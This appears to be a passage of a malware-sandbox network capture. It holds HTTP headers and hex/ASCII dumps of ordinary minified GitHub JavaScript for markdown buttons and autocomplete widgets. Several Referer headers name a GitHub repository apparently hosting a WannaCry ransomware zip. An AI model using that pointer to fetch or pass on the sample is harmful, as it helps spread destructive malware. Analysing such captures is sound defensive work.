                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 64 65 66 69 6e 65 28 22 6d 64 2d 71 75 6f 74 65 22 2c 4d 61 72 6b 64 6f 77 6e 51 75 6f 74 65 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 29 29 3b 6c 65 74 20 4d 61 72 6b 64 6f 77 6e 43 6f 64 65 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 3d 63 6c 61 73 73 20 4d 61 72 6b 64 6f 77 6e 43 6f 64 65 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 4d 61 72 6b 64 6f 77 6e 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 7b 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 64 2e 73 65 74 28 74 68 69 73 2c 7b 70 72 65 66 69 78 3a 22 60 22 2c 73 75 66 66 69 78 3a 22 60 22 2c 62 6c 6f 63 6b 50 72 65 66 69 78 3a 22 60 60 60 22 2c 62 6c 6f 63 6b 53 75 66 66 69 78 3a 22 60 60 60 22 7d 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 75
                                                                                      Data Ascii: stomElements.define("md-quote",MarkdownQuoteButtonElement));let MarkdownCodeButtonElement=class MarkdownCodeButtonElement extends MarkdownButtonElement{connectedCallback(){d.set(this,{prefix:"`",suffix:"`",blockPrefix:"```",blockSuffix:"```"})}};window.cu
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2e 4d 61 72 6b 64 6f 77 6e 55 6e 6f 72 64 65 72 65 64 4c 69 73 74 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 3d 4d 61 72 6b 64 6f 77 6e 55 6e 6f 72 64 65 72 65 64 4c 69 73 74 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 2c 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 64 65 66 69 6e 65 28 22 6d 64 2d 75 6e 6f 72 64 65 72 65 64 2d 6c 69 73 74 22 2c 4d 61 72 6b 64 6f 77 6e 55 6e 6f 72 64 65 72 65 64 4c 69 73 74 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 29 29 3b 6c 65 74 20 4d 61 72 6b 64 6f 77 6e 4f 72 64 65 72 65 64 4c 69 73 74 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 3d 63 6c 61 73 73 20 4d 61 72 6b 64 6f 77 6e 4f 72 64 65 72 65 64 4c 69 73 74 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 4d 61 72 6b 64 6f 77 6e 42 75 74 74 6f 6e
                                                                                      Data Ascii: .MarkdownUnorderedListButtonElement=MarkdownUnorderedListButtonElement,window.customElements.define("md-unordered-list",MarkdownUnorderedListButtonElement));let MarkdownOrderedListButtonElement=class MarkdownOrderedListButtonElement extends MarkdownButton
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2c 7b 70 72 65 66 69 78 3a 22 23 22 2c 70 72 65 66 69 78 53 70 61 63 65 3a 21 30 7d 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 67 65 74 28 22 6d 64 2d 72 65 66 22 29 7c 7c 28 77 69 6e 64 6f 77 2e 4d 61 72 6b 64 6f 77 6e 52 65 66 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 3d 4d 61 72 6b 64 6f 77 6e 52 65 66 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 2c 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 64 65 66 69 6e 65 28 22 6d 64 2d 72 65 66 22 2c 4d 61 72 6b 64 6f 77 6e 52 65 66 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 29 29 3b 6c 65 74 20 4d 61 72 6b 64 6f 77 6e 53 74 72 69 6b 65 74 68 72 6f 75 67 68 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 3d 63 6c 61 73 73 20 4d 61 72 6b 64 6f 77 6e 53 74 72 69 6b 65 74 68 72 6f
                                                                                      Data Ascii: ,{prefix:"#",prefixSpace:!0})}};window.customElements.get("md-ref")||(window.MarkdownRefButtonElement=MarkdownRefButtonElement,window.customElements.define("md-ref",MarkdownRefButtonElement));let MarkdownStrikethroughButtonElement=class MarkdownStrikethro
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 73 22 3d 3d 3d 65 26 26 28 6e 75 6c 6c 3d 3d 3d 6e 3f 6d 28 74 68 69 73 29 3a 66 28 74 68 69 73 29 29 7d 64 69 73 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 66 28 74 68 69 73 29 7d 67 65 74 20 66 69 65 6c 64 28 29 7b 6c 65 74 20 65 3b 6c 65 74 20 74 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 66 6f 72 22 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 6e 3d 22 67 65 74 52 6f 6f 74 4e 6f 64 65 22 69 6e 20 74 68 69 73 3f 74 68 69 73 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 3a 64 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 28 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 6f 63 75 6d 65 6e 74 7c 7c 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 29 26 26 28 65 3d 6e 2e 67 65 74 45 6c 65
                                                                                      Data Ascii: s"===e&&(null===n?m(this):f(this))}disconnectedCallback(){f(this)}get field(){let e;let t=this.getAttribute("for");if(!t)return null;let n="getRootNode"in this?this.getRootNode():document;return(n instanceof Document||n instanceof ShadowRoot)&&(e=n.getEle


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.1649724185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC736OUTGET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_auto-complete-element-81d69b-d1813ba335d8.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 32234
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Mon, 11 Mar 2024 22:30:21 GMT
                                                                                      ETag: 0x8DC421AD6B7F754
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 421478
                                                                                      X-Served-By: cache-iad-kiad7000140-IAD, cache-ewr18133-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 27, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 89e10dd8f996cf2530d64b0b62ea75ced4a12587
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 75 74 6f 2d 63 6f 6d 70 6c 65 74 65 2d 65 6c 65 6d 65 6e 74 2d 38 31 64 36 39 62 22 2c 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_delegated-events_dist_index_js-node_modules_github_auto-complete-element-81d69b","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-a
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 53 22 2c 73 65 6c 65 63 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 69 66 28 65 3d 74 2e 6d 61 74 63 68 28 6c 29 29 72 65 74 75 72 6e 20 65 5b 30 5d 2e 73 6c 69 63 65 28 31 29 7d 2c 65 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 63 6c 61 73 73 4e 61 6d 65 3b 69 66 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 65 2e 73 70 6c 69 74 28 2f 5c 73 2f 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 62 61 73 65 56 61 6c 22 69 6e 20 65 29 72 65 74 75 72 6e 20 65 2e 62 61 73 65 56 61 6c 2e 73 70 6c 69 74 28 2f 5c 73 2f 29 7d 7d 7d 29 3b 76 61 72 20 63 3d 2f 5e 28 28 3f 3a 5b 5c 77 5c 75 30 30 63 30 2d 5c 75 46 46 46 46 5c 2d
                                                                                      Data Ascii: S",selector:function(t){var e;if(e=t.match(l))return e[0].slice(1)},element:function(t){var e=t.className;if(e){if("string"==typeof e)return e.split(/\s/);if("object"==typeof e&&"baseVal"in e)return e.baseVal.split(/\s/)}}});var c=/^((?:[\w\u00c0-\uFFFF\-
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 29 7b 66 6f 72 28 69 3d 30 2c 66 5b 28 6e 3d 7b 69 64 3a 74 68 69 73 2e 75 69 64 2b 2b 2c 73 65 6c 65 63 74 6f 72 3a 74 2c 64 61 74 61 3a 65 7d 29 2e 69 64 5d 3d 6e 2c 63 3d 64 28 74 68 69 73 2e 69 6e 64 65 78 65 73 2c 74 29 3b 69 3c 63 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 73 3d 28 75 3d 63 5b 69 5d 29 2e 6b 65 79 2c 28 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 6f 3b 66 6f 72 28 6e 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 69 66 28 6f 3d 74 5b 6e 5d 2c 65 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 6f 29 29 72 65 74 75 72 6e 20 6f 7d 28 68 2c 72 3d 75 2e 69 6e 64 65 78 29 29 7c 7c 28 28 61 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 72 29 29 2e 6d 61 70 3d 6e 65 77 20 6f 2c 68 2e 70 75 73 68 28 61
                                                                                      Data Ascii: t){for(i=0,f[(n={id:this.uid++,selector:t,data:e}).id]=n,c=d(this.indexes,t);i<c.length;i++)s=(u=c[i]).key,(a=function(t,e){var n,i,o;for(n=0,i=t.length;n<i;n++)if(o=t[n],e.isPrototypeOf(o))return o}(h,r=u.index))||((a=Object.create(r)).map=new o,h.push(a
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2c 72 3d 6c 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 63 3d 61 2e 6d 61 70 2e 67 65 74 28 6c 5b 6e 5d 29 29 66 6f 72 28 69 3d 30 2c 73 3d 63 2e 6c 65 6e 67 74 68 3b 69 3c 73 3b 69 2b 2b 29 21 66 5b 64 3d 28 75 3d 63 5b 69 5d 29 2e 69 64 5d 26 26 74 68 69 73 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 28 74 2c 75 2e 73 65 6c 65 63 74 6f 72 29 26 26 28 66 5b 64 5d 3d 21 30 2c 6d 2e 70 75 73 68 28 75 29 29 7d 72 65 74 75 72 6e 20 6d 2e 73 6f 72 74 28 68 29 7d 3b 76 61 72 20 70 3d 7b 7d 2c 66 3d 7b 7d 2c 6d 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 62 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 67 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 76 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 45 76 65 6e
                                                                                      Data Ascii: ,r=l.length;n<r;n++)if(c=a.map.get(l[n]))for(i=0,s=c.length;i<s;i++)!f[d=(u=c[i]).id]&&this.matchesSelector(t,u.selector)&&(f[d]=!0,m.push(u))}return m.sort(h)};var p={},f={},m=new WeakMap,b=new WeakMap,g=new WeakMap,v=Object.getOwnPropertyDescriptor(Even
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2c 65 2c 6e 29 7b 76 61 72 20 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3a 7b 7d 2c 6f 3d 21 21 69 2e 63 61 70 74 75 72 65 2c 72 3d 6f 3f 66 3a 70 2c 73 3d 72 5b 74 5d 3b 73 26 26 28 73 2e 72 65 6d 6f 76 65 28 65 2c 6e 29 2c 73 2e 73 69 7a 65 7c 7c 28 64 65 6c 65 74 65 20 72 5b 74 5d 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 78 2c 6f 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 65 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 63 61 6e 63 65 6c 61 62
                                                                                      Data Ascii: ,e,n){var i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:{},o=!!i.capture,r=o?f:p,s=r[t];s&&(s.remove(e,n),s.size||(delete r[t],document.removeEventListener(t,x,o)))}function L(t,e,n){return t.dispatchEvent(new CustomEvent(e,{bubbles:!0,cancelab
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 2e 63 6f 6d 70 6f 73 69 74 69 6f 6e 45 76 65 6e 74 48 61 6e 64 6c 65 72 3d 74 3d 3e 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 65 2e 69 73 43 6f 6d 70 6f 73 69 6e 67 3d 22 63 6f 6d 70 6f 73 69 74 69 6f 6e 73 74 61 72 74 22 3d 3d 3d 74 2e 74 79 70 65 3b 6c 65 74 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 69 6e 70 75 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 29 7c 7c 22 22 29 3b 6e 26 26 65 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 28 29 7d 29 28 74 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 6e 70 75 74 48 61 6e 64 6c 65 72 3d 74 68 69 73 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22
                                                                                      Data Ascii: .compositionEventHandler=t=>(function(t,e){e.isComposing="compositionstart"===t.type;let n=document.getElementById(e.input.getAttribute("aria-controls")||"");n&&e.clearSelection()})(t,this),this.inputHandler=this.clearSelection.bind(this),t.setAttribute("
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 6c 65 72 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 74 68 69 73 2e 6b 65 79 62 6f 61 72 64 45 76 65 6e 74 48 61 6e 64 6c 65 72 29 2c 74 68 69 73 2e 6c 69 73 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 69 29 7d 69 6e 64 69 63 61 74 65 44 65 66 61 75 6c 74 4f 70 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 46 69 72 73 74 4f 70 74 69 6f 6e 26 26 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6c 69 73 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 5d 3a 6e 6f 74 28 5b 61 72 69 61 2d 64 69 73 61 62 6c 65 64 3d 22
                                                                                      Data Ascii: ler),this.input.removeEventListener("keydown",this.keyboardEventHandler),this.list.removeEventListener("click",i)}indicateDefaultOption(){var t;this.defaultFirstOption&&(null===(t=Array.from(this.list.querySelectorAll('[role="option"]:not([aria-disabled="
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 6f 6e 28 74 2c 65 29 7b 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 63 6f 6d 62 6f 62 6f 78 2d 63 6f 6d 6d 69 74 22 2c 7b 62 75 62 62 6c 65 73 3a 21 30 2c 64 65 74 61 69 6c 3a 65 7d 29 29 7d 28 65 2c 7b 65 76 65 6e 74 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 3d 22 74 72 75 65 22 5d 2c 20 5b 64 61 74 61 2d 63 6f 6d 62 6f 62 6f 78 2d 6f 70 74 69 6f 6e 2d 64 65 66 61 75 6c 74 3d 22 74 72 75 65 22 5d 27 29 3b 72 65 74 75 72 6e 21 21 6e 26 26 28 22 74 72 75 65 22 3d 3d 3d 6e 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 29 7c 7c 28 6e
                                                                                      Data Ascii: on(t,e){t.dispatchEvent(new CustomEvent("combobox-commit",{bubbles:!0,detail:e}))}(e,{event:t})}function o(t,e){let n=e.querySelector('[aria-selected="true"], [data-combobox-option-default="true"]');return!!n&&("true"===n.getAttribute("aria-disabled")||(n
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 3a 70 6f 70 6f 76 65 72 2d 6f 70 65 6e 22 29 26 26 74 68 69 73 2e 72 65 73 75 6c 74 73 2e 68 69 64 65 50 6f 70 6f 76 65 72 28 29 3a 74 68 69 73 2e 72 65 73 75 6c 74 73 2e 68 69 64 64 65 6e 3d 21 30 2c 74 68 69 73 2e 72 65 73 75 6c 74 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 29 7c 7c 74 68 69 73 2e 72 65 73 75 6c 74 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 2c 22 72 65 73 75 6c 74 73 22 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 22 6f 66 66 22 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 70 65 6c 6c 63 68 65 63 6b 22 2c 22 66 61 6c 73 65 22 29 2c 74 68 69 73 2e
                                                                                      Data Ascii: :popover-open")&&this.results.hidePopover():this.results.hidden=!0,this.results.getAttribute("aria-label")||this.results.setAttribute("aria-label","results"),this.input.setAttribute("autocomplete","off"),this.input.setAttribute("spellcheck","false"),this.
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 68 69 73 2e 6f 6e 49 6e 70 75 74 43 68 61 6e 67 65 29 2c 74 68 69 73 2e 72 65 73 75 6c 74 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 74 68 69 73 2e 6f 6e 52 65 73 75 6c 74 73 4d 6f 75 73 65 44 6f 77 6e 29 2c 74 68 69 73 2e 72 65 73 75 6c 74 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6d 62 6f 62 6f 78 2d 63 6f 6d 6d 69 74 22 2c 74 68 69 73 2e 6f 6e 43 6f 6d 6d 69 74 29 7d 68 61 6e 64 6c 65 43 6c 65 61 72 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 22 74 72 75 65 22 3d 3d 3d 74 68 69 73 2e 69 6e 70 75 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 29 26 26 28 74 68 69 73 2e 69 6e 70 75 74 2e 73 65 74
                                                                                      Data Ascii: his.onInputChange),this.results.removeEventListener("mousedown",this.onResultsMouseDown),this.results.removeEventListener("combobox-commit",this.onCommit)}handleClear(t){t.preventDefault(),"true"===this.input.getAttribute("aria-expanded")&&(this.input.set


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.1649725185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC699OUTGET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-8a621df59e80.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 11696
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 23 Feb 2024 10:52:50 GMT
                                                                                      ETag: 0x8DC345D9433CD2B
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 2090445
                                                                                      X-Served-By: cache-iad-kcgs7200178-IAD, cache-lga21931-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 3098, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 8d93bce7df6daa81788f356d7f211b35b6c6b367
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 78 74 2d 65 78 70 61 6e 64 65 72 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 33 33 34 39 31 3a 28 29 3d 3e 7b 6c 65 74 20 43 6f 6d 62 6f 62 6f 78 3d 63 6c 61 73 73 20 43 6f 6d 62 6f 62 6f 78 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 2c 69 2c 7b 74 61 62 49 6e 73 65 72 74 73 53 75 67 67 65 73 74 69 6f 6e 73 3a 6e 2c 64 65 66 61 75 6c 74 46 69 72 73 74 4f 70 74 69 6f 6e 3a 73 2c 73 63 72 6f 6c 6c 49 6e 74 6f 56 69
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_text-expander-element_dist_index_js"],{33491:()=>{let Combobox=class Combobox{constructor(t,i,{tabInsertsSuggestions:n,defaultFirstOption:s,scrollIntoVi
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 29 3b 69 26 26 65 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 28 29 7d 29 28 74 2c 74 68 69 73 29 2c 74 68 69 73 2e 69 6e 70 75 74 48 61 6e 64 6c 65 72 3d 74 68 69 73 2e 63 6c 65 61 72 53 65 6c 65 63 74 69 6f 6e 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c 22 63 6f 6d 62 6f 62 6f 78 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 69 2e 69 64 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 66 61 6c 73 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 22 6c 69 73 74 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72
                                                                                      Data Ascii: );i&&e.clearSelection()})(t,this),this.inputHandler=this.clearSelection.bind(this),t.setAttribute("role","combobox"),t.setAttribute("aria-controls",i.id),t.setAttribute("aria-expanded","false"),t.setAttribute("aria-autocomplete","list"),t.setAttribute("ar
